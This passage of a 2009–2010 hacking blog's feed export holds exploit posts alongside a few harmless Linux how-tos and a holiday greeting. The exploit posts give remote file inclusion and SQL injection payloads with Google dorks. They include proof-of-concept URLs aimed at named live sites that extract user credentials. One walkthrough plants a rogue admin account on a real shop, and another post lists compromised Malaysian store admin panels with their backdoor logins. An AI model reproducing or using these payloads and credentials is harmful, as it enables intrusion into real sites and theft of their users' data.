height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-1290464663870787905</id><published>2010-03-14T13:15:00.002+07:00</published><updated>2010-03-14T13:19:34.272+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>osDate RFI Vuln</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;&lt;br /&gt;[o] osDate Remote File Inclusion Vulnerabilities&lt;br /&gt;&lt;/span&gt;Software : osDate dating and matchmaking script version 2.1.9 [mostly affected]&lt;br /&gt;Vendor   : http://www.tufat.com/&lt;br /&gt;Download : http://www.tufat.com/s_free_dating_system.htm&lt;br /&gt;Author   : NoGe&lt;br /&gt;Contact  : noge[dot]code[at]gmail[dot]com&lt;br /&gt;Blog     : http://evilc0de.blogspot.com/&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;[o] Vulnerable file&lt;br /&gt;&lt;/span&gt;include_once($config['forum_installed'] . "_forum.php");&lt;br /&gt;forum/adminLogin.php&lt;br /&gt;forum/userLogin.php&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;[o] Exploit&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/forum/adminLogin.php?config[forum_installed]=[evilc0de]&lt;br /&gt;http://localhost/[path]/forum/userLogin.php?config[forum_installed]=[evilc0de]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;"powered by osdate"&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-1290464663870787905?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/1290464663870787905/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=1290464663870787905' title='13 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1290464663870787905'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1290464663870787905'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/03/osdate-rfi-vuln.html' title='osDate RFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>13</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-3398062103433637887</id><published>2010-03-04T17:18:00.011+07:00</published><updated>2010-04-08T02:19:30.708+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Pre E-Learning Portal SQL Injection Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;[o] Pre E-Learning Portal SQL Injection Vulnerability&lt;/span&gt;&lt;br /&gt;Software : Pre E-Learning Portal&lt;br /&gt;Vendor   : http://www.preproject.com/&lt;br /&gt;Demo     : http://www.preprojects.com/elearning/&lt;br /&gt;Author   : NoGe&lt;br /&gt;Contact  : noge[dot]code[at]gmail[dot]com&lt;br /&gt;Blog     : http://evilc0de.blogspot.com/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;[o] Vulnerable file&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;search_result.asp [ course_ID ]&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;http://localhost/elearning/search_result.asp?courses=1&amp;amp;course_ID=[SQL]&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span&gt;&lt;span&gt;&lt;span style="font-weight: bold;"&gt;[o] Proof of Concept&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span&gt;&lt;span&gt;http://www.preprojects.com/elearning/search_result.asp?courses=1&amp;amp;course_ID=194+and+1=0+union+all+select+1,(login%2B':'%2Bpassword%2B':'%2Bemail),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+[login]#&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span&gt;&lt;span&gt;u cant see the result?? press ctrl+u and scroll down.. :p&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span&gt;&lt;span&gt;big thanks to Vrs-hCk&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-3398062103433637887?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/3398062103433637887/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=3398062103433637887' title='17 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3398062103433637887'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3398062103433637887'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/03/pre-e-learning-portal-sql-injection.html' title='Pre E-Learning Portal SQL Injection Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>17</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-3627912439269449053</id><published>2010-02-20T13:07:00.005+07:00</published><updated>2010-02-20T14:20:22.906+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>XOOPS Module Zen Cart</title><content type='html'>this an old bug from BlackH &gt;&gt; http://milw0rm.com/exploits/9005&lt;br /&gt;works for Zen Cart version 1.3.8 but its works on XOOPS Zen Cart module too&lt;br /&gt;lets go.. :p&lt;br /&gt;&lt;br /&gt;google dork&lt;br /&gt;&lt;br /&gt;"powered by xoops" inurl:"modules/zox"&lt;br /&gt;"powered by xoops" "zen cart"&lt;br /&gt;&lt;br /&gt;run the exploit from ur shell&lt;br /&gt;&lt;br /&gt;root@evilc0de:/home/noge# ./zen.py -url http://www.a-akinai.com/modules/zox&lt;br /&gt;sql@jah$ &lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;now try with show tables; command, if it success then we can exploit the target&lt;br /&gt;&lt;br /&gt;sql@jah$ show tables;&lt;br /&gt;&gt;&gt; success ( show tables; )&lt;br /&gt;&lt;br /&gt;command execute successfully.. but u cant see the table list right?&lt;br /&gt;lets add admin user to database with this sql command..&lt;br /&gt;&lt;br /&gt;sql@jah$ INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (55, 'giant', 'admin@localhost', '617ec22fbb8f201c366e9848c0eb6925:87');&lt;br /&gt;&gt;&gt; success ( INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (55, 'giant', 'admin@localhost', '617ec22fbb8f201c366e9848c0eb6925:87'); )&lt;br /&gt;&lt;br /&gt;admin added successfully.. now try login to admin panel..&lt;br /&gt;&lt;br /&gt;http://www.a-akinai.com/modules/zox/admin/login.php&lt;br /&gt;username : giant&lt;br /&gt;password : wew&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-3627912439269449053?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/3627912439269449053/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=3627912439269449053' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3627912439269449053'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3627912439269449053'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/02/xoops-module-zen-cart.html' title='XOOPS Module Zen Cart'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-8270089154946555707</id><published>2010-02-15T12:12:00.010+07:00</published><updated>2010-02-15T18:14:28.912+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mixed'/><title type='text'>Malaysian Zen Cart Sites</title><content type='html'>iseng2 nyari web malay sebelum makan siang niy.. wkawkakwakwkak..&lt;br /&gt;&lt;br /&gt;login : adminz&lt;br /&gt;pass : wew&lt;br /&gt;&lt;br /&gt;ato&lt;br /&gt;&lt;br /&gt;login : ganteng&lt;br /&gt;pass : qwerty&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;http://www.batunisan.com.my/admin/login.php&lt;br /&gt;&lt;br /&gt;http://delcom.net.my/shop/admin/login.php&lt;br /&gt;&lt;br /&gt;http://mumdreams.com.my/onlinebutik/admin/login.php&lt;br /&gt;&lt;br /&gt;http://sandmanguitaronline.com/admin/login.php&lt;br /&gt;&lt;br /&gt;http://mixandmatch.com.my/zencart/admin/login.php&lt;br /&gt;&lt;br /&gt;http://www.masterschoice.com.my/store/admin/login.php&lt;br /&gt;&lt;br /&gt;http://www.aimeily.com.my/shop/admin/login.php&lt;br /&gt;&lt;br /&gt;http://www.4allbeauty.com.my/shop2/admin/login.php&lt;br /&gt;&lt;br /&gt;http://www.eco-sports.com.my/shop/admin/login.php&lt;br /&gt;&lt;br /&gt;http://cyclegarage.com.my/garage/v1.3.8/admin/login.php&lt;br /&gt;&lt;br /&gt;http://grays.com.my/shop/admin/login.php&lt;br /&gt;&lt;br /&gt;http://shopping.ofitech.com.my/admin/login.php&lt;br /&gt;&lt;br /&gt;http://ziodex.com.my/store/admin/login.php&lt;br /&gt;&lt;br /&gt;http://ezprint.com.my/admin/login.php&lt;br /&gt;&lt;br /&gt;http://www.utamaflorist.com/admin/login.php&lt;br /&gt;&lt;br /&gt;http://www.protonsonic.com.my/admin/login.php&lt;br /&gt;&lt;br /&gt;http://jackrabbit.com.my/admin/login.php&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-8270089154946555707?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/8270089154946555707/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=8270089154946555707' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8270089154946555707'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8270089154946555707'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/02/malaysian-zen-cart-sites.html' title='Malaysian Zen Cart Sites'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-338774873950367492</id><published>2010-01-13T11:31:00.005+07:00</published><updated>2010-01-13T11:56:44.144+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='linux'/><title type='text'>XMMS packages for Debian and Ubuntu + XMMS Skins</title><content type='html'>&lt;pre&gt;&lt;br /&gt;XMMS is a legacy GTK+1 music player modeled after Winamp.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] How to install XMMS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Add the relevant two lines below to /etc/apt/sources.list&lt;br /&gt;open console/terminal and run &lt;em style="font-weight: bold;"&gt;aptitude update &amp;amp;&amp;amp; aptitude install xmms&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;Debian Lenny 32- and 64-bit x86&lt;br /&gt;&lt;br /&gt;deb http://www.pvv.ntnu.no/~knuta/xmms/lenny ./&lt;br /&gt;deb-src http://www.pvv.ntnu.no/~knuta/xmms/lenny ./&lt;br /&gt;&lt;br /&gt;Ubuntu Hardy 32- and 64-bit x86&lt;br /&gt;&lt;br /&gt;deb http://www.pvv.ntnu.no/~knuta/xmms/hardy ./&lt;br /&gt;deb-src http://www.pvv.ntnu.no/~knuta/xmms/hardy ./&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Ubuntu Jaunty 32- and 64-bit x86&lt;br /&gt;&lt;br /&gt;deb http://www.pvv.ntnu.no/~knuta/xmms/jaunty ./&lt;br /&gt;deb-src http://www.pvv.ntnu.no/~knuta/xmms/jaunty ./&lt;br /&gt;&lt;br /&gt;Ubuntu Karmic 32- and 64-bit x86&lt;br /&gt;&lt;br /&gt;deb http://www.pvv.ntnu.no/~knuta/xmms/karmic ./&lt;br /&gt;deb-src http://www.pvv.ntnu.no/~knuta/xmms/karmic ./&lt;br /&gt;&lt;br /&gt;To open XMMS player, press ALT+F2 and type XMMS&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] How to install XMMS skins&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;You can download skins here http://gnome-look.org&lt;br /&gt;Extract the skin packages and paste it here /usr/share/xmms/Skins&lt;br /&gt;If there is no Skins directory, you have to create it first&lt;br /&gt;To change skin in XMMS just press ALT+S and choose your skin&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./NoGe&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-338774873950367492?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/338774873950367492/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=338774873950367492' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/338774873950367492'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/338774873950367492'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/01/xmms-packages-for-debian-and-ubuntu.html' title='XMMS packages for Debian and Ubuntu + XMMS Skins'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-1001330690128418785</id><published>2010-01-06T19:47:00.004+07:00</published><updated>2010-01-06T20:05:45.585+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Hispanic Digital Network Blind SQL Injection Vuln</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;[o] Hispanic Digital Network Blind SQL Injection Vulnerability&lt;br /&gt;&lt;/span&gt;Software : Hispanic Digital Network&lt;br /&gt;Vendor   : http://www.hdnweb.com/&lt;br /&gt;Author   : NoGe&lt;br /&gt;Contact  : noge[dot]code[at]gmail[dot]com&lt;br /&gt;Blog     : http://evilc0de.blogspot.com/&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;[o] Vulnerable file&lt;br /&gt;&lt;/span&gt;news.php&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;&lt;br /&gt;[o] Exploit&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/news&lt;/span&gt;.php&lt;span class="fullpost"&gt;?nid=[Blind SQL]&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span&gt;&lt;span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Proof of Concept&lt;/span&gt;&lt;br /&gt;http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4 = false&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span&gt;&lt;span&gt;http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5 = true&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=4 = false&lt;br /&gt;http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=5 = true&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span&gt;&lt;span&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;"powered by Hispanic Digital Network"&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;em&gt;&lt;br /&gt;&lt;/em&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span&gt;&lt;span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Notes&lt;/span&gt;&lt;br /&gt;fucking private script again and all target are in one IP address. lol&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-1001330690128418785?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/1001330690128418785/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=1001330690128418785' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1001330690128418785'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1001330690128418785'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/01/hispanic-digital-network-blind-sql.html' title='Hispanic Digital Network Blind SQL Injection Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-182779961007595251</id><published>2009-12-24T12:33:00.004+07:00</published><updated>2009-12-24T12:48:39.025+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mixed'/><title type='text'>..:: Season Greeting ::..</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_dxtzvQwAPwE/SzMABxe6vEI/AAAAAAAAAFg/UN7K3cKU5kI/s1600-h/christmas-ornament-border-thumb3025983.jpg"&gt;&lt;img style="cursor: pointer; width: 256px; height: 320px;" src="http://3.bp.blogspot.com/_dxtzvQwAPwE/SzMABxe6vEI/AAAAAAAAAFg/UN7K3cKU5kI/s320/christmas-ornament-border-thumb3025983.jpg" alt="" id="BLOGGER_PHOTO_ID_5418674807119723586" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="color: rgb(255, 0, 0);font-family:courier new;font-size:180%;"  &gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;M E R R Y   C H R I S T M A S&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;A N D&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:courier new;"&gt;H A P P Y    N E W    Y E A R&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: courier new; color: rgb(51, 204, 0);font-size:180%;" &gt;GOD BLESS YOU ALL&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-182779961007595251?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/182779961007595251/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=182779961007595251' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/182779961007595251'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/182779961007595251'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/12/season-greeting.html' title='..:: Season Greeting ::..'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_dxtzvQwAPwE/SzMABxe6vEI/AAAAAAAAAFg/UN7K3cKU5kI/s72-c/christmas-ornament-border-thumb3025983.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-948964376668022575</id><published>2009-12-15T20:20:00.015+07:00</published><updated>2009-12-15T23:00:22.437+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='linux'/><title type='text'>SSH Tunnel with gSTM in ubuntu</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;"&gt;what is gSTM??&lt;/span&gt; [ Gnome SSH Tunnel Manager ]&lt;br /&gt;&lt;br /&gt;gSTM is a front-end for managing SSH-tunneled port redirects. It stores tunnel configurations in a simple XML format.&lt;br /&gt;The tunnels (local, remote and dynamic) can be managed and individually started/stopped through one simple interface.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;download gSTM&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://sourceforge.net/projects/gstm/&lt;br /&gt;http://kent.dl.sourceforge.net/sourceforge/gstm/gstm_1.2_i386.deb&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;install gSTM&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;sudo dpkg -i gstm_1.2_i386.deb&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;using gSTM&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;here is my local IP before use gSTM&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_dxtzvQwAPwE/SyeNsCiuGcI/AAAAAAAAAEg/DkJZ3vBOLFU/s1600-h/1.png"&gt;&lt;img style="cursor: pointer; width: 320px; height: 240px;" src="http://4.bp.blogspot.com/_dxtzvQwAPwE/SyeNsCiuGcI/AAAAAAAAAEg/DkJZ3vBOLFU/s320/1.png" alt="" id="BLOGGER_PHOTO_ID_5415452864672569794" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;after installation now go to &lt;span style="font-weight: bold;"&gt;Applications&lt;/span&gt; &gt;&gt; &lt;span style="font-weight: bold;"&gt;Internet&lt;/span&gt; &gt;&gt; &lt;span style="font-weight: bold;"&gt;gSTM&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_dxtzvQwAPwE/SyeObei-6DI/AAAAAAAAAEo/5PqEy8cS4Zk/s1600-h/2.png"&gt;&lt;img style="cursor: pointer; width: 265px; height: 320px;" src="http://1.bp.blogspot.com/_dxtzvQwAPwE/SyeObei-6DI/AAAAAAAAAEo/5PqEy8cS4Zk/s320/2.png" alt="" id="BLOGGER_PHOTO_ID_5415453679643715634" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;click Add and change the name with what ever you like&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 